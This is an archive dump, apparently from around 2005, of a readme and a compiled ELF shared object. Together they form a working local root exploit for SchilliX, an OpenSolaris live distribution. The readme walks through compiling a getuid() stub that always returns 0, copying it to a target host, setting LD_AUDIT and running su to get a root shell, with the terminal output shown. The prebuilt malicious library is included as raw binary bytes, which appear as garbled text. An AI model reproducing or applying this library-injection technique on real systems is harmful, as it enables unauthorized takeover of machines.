Schillix.txt0000644000175000017500000000364110261630133016271 0ustar kfinisterrekfinisterre00000000000000SchilliX is an OpenSolaris based distribution which runs from CD and could be installed on your harddisk or onto an USB memory stick. http://schillix.berlios.de/ This is an exploit binary for Schillix based 100% on information from venglin[at]freebsd[dot]lublin[dot]pl http://www.securityfocus.com/archive/1/403574/30/0/threaded I only spent about 2 minutes compiling this and I certainly did not invest any time in finding the exploit. First you need to compile a shared object to use as a getuid() replacement. Unless you already have root on a Schillix box this part will not be possible. Hence why I have provided Schily-Root.so in this .tar file. Last login: Sat Jul 2 16:38:35 2005 Sun Microsystems Inc. SunOS 5.11 schily17 Jun. 17, 2005 SunOS Internal Development: jes 2005-06-17 [schily17] # mkdir /opt/gcc-3.4.3 # mount -F lofs -O /.cdrom/opt/gcc-3.4.3 /opt/gcc-3.4.3 # PATH=$PATH:/usr/sps/bin:/usr/sfw/bin:/usr/ccs/bin # export PATH # cat > /tmp/Schily-Root.c int getuid() { return 0; } ^C # gcc -fPIC -shared -o /tmp/Schily-Root.so /tmp/Schily-Root.c Move your shared object to the machine you wish to exploit... kfinisterre@animosity:~$ scp Schily-Root.so schillix@192.168.1.207:/tmp/Schily-Root.so Schily-Root.so 100% 4716 4.6KB/s 00:00 Take root. kfinisterre@animosity:~$ ssh -l schillix 192.168.1.207 Last login: Sat Jul 2 16:44:16 2005 from 192.168.1.202 Sun Microsystems Inc. SunOS 5.11 schily17 Jun. 17, 2005 SunOS Internal Development: jes 2005-06-17 [schily17] -bash-3.00$ export LD_AUDIT=/tmp/Schily-Root.so -bash-3.00$ su - ld.so.1: su: warning: libgcc_s.so.1: open failed: No such file or directory ld.so.1: su: warning: /tmp/Schily-Root.so: audit initialization failure: disabled Sun Microsystems Inc. SunOS 5.11 schily17 Jun. 17, 2005 SunOS Internal Development: jes 2005-06-17 [schily17] # id uid=0(root) gid=0(root) Schily-Root.so0000755000175000017500000001115410261627056016503 0ustar kfinisterrekfinisterre00000000000000ELF4\4 (  P"7> T h"    P  _PROCEDURE_LINKAGE_TABLE___register_frame_info_bases_edata_GLOBAL_OFFSET_TABLE__Jv_RegisterClasses__deregister_frame_info_bases_DYNAMIC_etext_lib_version_fini_initgetuid_end__dso_handlelibgcc_s.so.1GCC_3.0/usr/sfw/libP&y hh hUS[3Rt :ҋu鋃 t Pƃ]ÐUS[PtSjPPStt P=]UUVS[fp@Ћu[^US[3G[US[[fv     ooo88oo 08P      (3AObos  (\ P1"MT j ~"    P  /tmp/Schily-Root.socrti.svalues-Xa.ccrtstuff.c__CTOR_LIST____DTOR_LIST____EH_FRAME_BEGIN____JCR_LIST__p.0completed.1__do_global_dtors_auxobject.2frame_dummySchily-Root.c__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxcrtn.s_END__START__PROCEDURE_LINKAGE_TABLE___register_frame_info_bases_edata_GLOBAL_OFFSET_TABLE__Jv_RegisterClasses__deregister_frame_info_bases_DYNAMIC_etext_lib_version_fini_initgetuid_end__dso_handle@(#)SunOS 5.11 schily17 October 2007@(#)SunOS Internal Development: jes 2005-06-17 [schily17]@(#)SunOS 5.11 schily17 October 2007@(#)SunOS Internal Development: jes 2005-06-17 [schily17]GCC: (GNU) 3.4.3 (csl-sol210-3_4-branch+sol_rpath)GCC: (GNU) 3.4.3 (csl-sol210-3_4-branch+sol_rpath)GCC: (GNU) 3.4.3 (csl-sol210-3_4-branch+sol_rpath)@(#)SunOS 5.11 schily17 October 2007@(#)SunOS Internal Development: jes 2005-06-17 [schily17]ld: Software Generation Utilities - Solaris Link Editors: 5.11-1.496.hash.dynsym.dynstr.SUNW_version.rel.got.rel.data.rel.local.rel.plt.text.init.fini.rodata.dynamic.data.ctors.dtors.eh_frame.jcr.bss.symtab.strtab.comment.shstrtab "  o % B . B00B B88FPP@KQW])$ent{21